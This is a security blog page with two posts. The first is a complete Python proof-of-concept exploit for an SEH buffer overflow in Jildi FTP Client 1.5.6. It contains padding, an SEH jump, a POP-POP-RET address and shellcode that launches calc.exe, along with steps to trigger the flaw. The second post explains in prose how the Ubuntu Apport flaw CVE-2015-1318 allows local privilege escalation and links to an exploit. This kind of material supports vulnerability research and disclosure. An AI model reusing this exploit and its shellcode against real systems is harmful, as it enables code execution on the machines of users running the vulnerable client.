Wednesday, 3 June 2015

Jildi FTP Client 1.5.6 (SEH) BOF POC by Zahid Adeel

Jildi FTP Client (SEH) BOF

POC:

#!/usr/bin/python
#Author: Zahid Adeel
#Title: Jildi FTP Client 1.5.6 (SEH) BOF
#Version: 1.5.6 Build 1536
#Software Link: http://usfiles.brothersoft.com/internet/ftp/jildiftp.zip
#Tested on: WinXP Professional SP3
#Date: 2015-06-03


'''
How to test it:
Open jildi-poc.txt file and copy its content on clipboard. Then run Jildi FTP client, click on Connect icon and paste this string as server IP in text input field and click on connect. On successful execution, you will see calc.exe running on your system.
'''


fname="jildi-poc.txt"

junk = "A" * 10096
n_seh = "\xeb\x06\x90\x90"
ppr = "\x56\x0B\x01\x1B" # PPR in msjet40.dll

#run your calc.exe
shellcode=("\x89\xe5\xd9\xc2\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4b\x39\x43\x30"
"\x45\x50\x43\x30\x45\x30\x4c\x49\x5a\x45\x56\x51\x49\x42\x52"
"\x44\x4c\x4b\x50\x52\x56\x50\x4c\x4b\x51\x42\x54\x4c\x4c\x4b"
"\x56\x32\x54\x54\x4c\x4b\x52\x52\x56\x48\x54\x4f\x4f\x47\x50"
"\x4a\x56\x46\x56\x51\x4b\x4f\x56\x51\x49\x50\x4e\x4c\x47\x4c"
"\x43\x51\x43\x4c\x54\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54"
"\x4d\x43\x31\x49\x57\x4b\x52\x4c\x30\x56\x32\x50\x57\x4c\x4b"
"\x56\x32\x52\x30\x4c\x4b\x51\x52\x47\x4c\x43\x31\x58\x50\x4c"
"\x4b\x51\x50\x43\x48\x4b\x35\x4f\x30\x54\x34\x51\x5a\x43\x31"
"\x4e\x30\x56\x30\x4c\x4b\x51\x58\x45\x48\x4c\x4b\x56\x38\x47"
"\x50\x43\x31\x49\x43\x5a\x43\x47\x4c\x47\x39\x4c\x4b\x56\x54"
"\x4c\x4b\x43\x31\x49\x46\x50\x31\x4b\x4f\x50\x31\x4f\x30\x4e"
"\x4c\x4f\x31\x58\x4f\x54\x4d\x45\x51\x58\x47\x50\x38\x4d\x30"
"\x54\x35\x4c\x34\x45\x53\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x51"
"\x34\x52\x55\x4d\x32\x50\x58\x4c\x4b\x50\x58\x51\x34\x45\x51"
"\x49\x43\x52\x46\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x56\x38\x45"
"\x4c\x43\x31\x4e\x33\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x58\x50"
"\x4d\x59\x50\x44\x47\x54\x51\x34\x51\x4b\x51\x4b\x45\x31\x56"
"\x39\x50\x5a\x56\x31\x4b\x4f\x4b\x50\x51\x48\x51\x4f\x50\x5a"
"\x4c\x4b\x45\x42\x5a\x4b\x4d\x56\x51\x4d\x52\x4a\x45\x51\x4c"
"\x4d\x4b\x35\x4f\x49\x43\x30\x45\x50\x43\x30\x56\x30\x45\x38"
"\x56\x51\x4c\x4b\x52\x4f\x4c\x47\x4b\x4f\x4e\x35\x4f\x4b\x4b"
"\x4e\x54\x4e\x50\x32\x5a\x4a\x45\x38\x49\x36\x4d\x45\x4f\x4d"
"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x45\x56\x43\x4c\x45\x5a\x4d"
"\x50\x4b\x4b\x4b\x50\x54\x35\x54\x45\x4f\x4b\x50\x47\x54\x53"
"\x52\x52\x52\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x49\x45\x43"
"\x53\x45\x31\x52\x4c\x43\x53\x56\x4e\x45\x35\x54\x38\x45\x35"
"\x45\x50\x41\x41")

padding = "F" * (15000 - len(junk) -len(shellcode) - 8)
poc = junk + n_seh + ppr + shellcode + padding

fhandle = open(fname , 'wb')
fhandle.write(poc)
fhandle.close()
 

Wednesday, 15 April 2015

2015-CVE-1318 Leading To Privilege Escalation In Ubuntu Distros (Trusty, Utopic, Vivid)



Apport is a utility of Ubuntu which reports crash events of a user to bug track but who knew that a crash forwarding feature of this useful utility can lead to privilege escalation :D . I have confirmed this bug on Ubuntu Trusty (14.04) and i believe its worth sharing :)

Bug Explained:

A new feature was introduced in Ubuntu 14.04 which will forward any crash to another apport running in the task's namespace (in the case where the pid of the task in its namespace isn't equal to that in the host namespace).

This feature simply checks for the presence of /usr/share/apport/apport in the task's root directory. If it exists, it will chroot and exec the script.
The problem is that as apport is a coredump handler triggered by the kernel, it'll always run as real root, regardless of the crashed task's owner and namespace.
This therefore allows an unprivileged user to craft a specific filesystem structure, pivot_root to it, then crash a process inside it, causing apport outside of the namespace to execute a script as real root. By bind-mounting /proc from the host into that namespace, the unprivileged user can then access any file on the host as real root, causing the privilege escalation.

Severity (High):

A nobody user on a regular Ubuntu system can be root after successful exploitation.

Affected Distros:

  1. Ubuntu Trusty (14.04)
  2. Ubuntu Utopic (14.10)
  3. Ubuntu Vivid (15.04)

POC:

http://www.exploit-db.com/exploits/36746/

References:

https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758
http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1318.html